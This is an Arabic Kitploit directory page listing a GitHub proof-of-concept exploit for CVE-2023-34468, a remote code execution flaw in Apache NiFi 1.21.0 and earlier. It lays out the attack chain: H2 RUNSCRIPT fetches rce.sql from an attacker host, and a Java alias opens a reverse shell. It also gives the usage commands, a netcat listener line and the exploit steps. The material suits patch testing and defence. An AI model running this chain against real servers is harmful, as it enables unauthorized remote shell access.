Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34468-POC — استغلال PoC لـ CVE-2023-34468 — RCE عبر H2 RUNSCRIPT في Apache NiFi <= 1.21.0 | Kitploit
أدوات/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

استغلال PoC لـ CVE-2023-34468 — RCE عبر H2 RUNSCRIPT في Apache NiFi <= 1.21.0

عرض المستودع
4منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

تنفيذ التعليمات البرمجية عن بُعد عبر H2 Database RUNSCRIPT في Apache NiFi <= 1.21.0


الثغرة

تأتي Apache NiFi مع حزمة JAR لقاعدة بيانات H2 مضمّنة افتراضيًا. يمكن تكوين خدمة التحكم DBCPConnectionPool لاستخدام مشغّل H2 هذا. يدعم H2 عبارة RUNSCRIPT التي تجلب ملف SQL من عنوان URL بعيد وتنفّذه. يمكن لذلك الملف تعريف كود Java تعسفي عبر CREATE ALIAS وتنفيذه على نظام تشغيل الخادم.

سلسلة الهجوم:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

الإصدارات المتأثرة

البرنامجالإصدار
Apache NiFi<= 1.21.0
الإصلاح في1.21.1+
Javaأي (مضمّن)

المتطلبات

  • Python 3.x
  • مكتبة requests → pip install requests
  • هدف NiFi مع صلاحية كتابة مجهولة أو بيانات اعتماد صالحة
  • وصول شبكة من الهدف إلى جهازك (لاستدعاء القشرة العكسية)

الاستخدام

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

الوسائط


الإعداد

الطرفية 1 — المستمع:

root@kitploit:~
nc -lvnp 4444

الطرفية 2 — الاستغلال:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

ماذا يفعل إثبات الاختراق (PoC)

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
تنزيل الأداة
الوسيطالافتراضيالوصف
--targethttp://NiFi.target.comعنوان NiFi الأساسي المستهدف
--lhost10.10.10.10عنوان IP الخاص بك (tun0)
--lport4444منفذ الاستماع للقشرة العكسية
--http-port80المنفذ لتقديم rce.sql
--cleanupFalseحذف العناصر المنشأة بعد التشغيل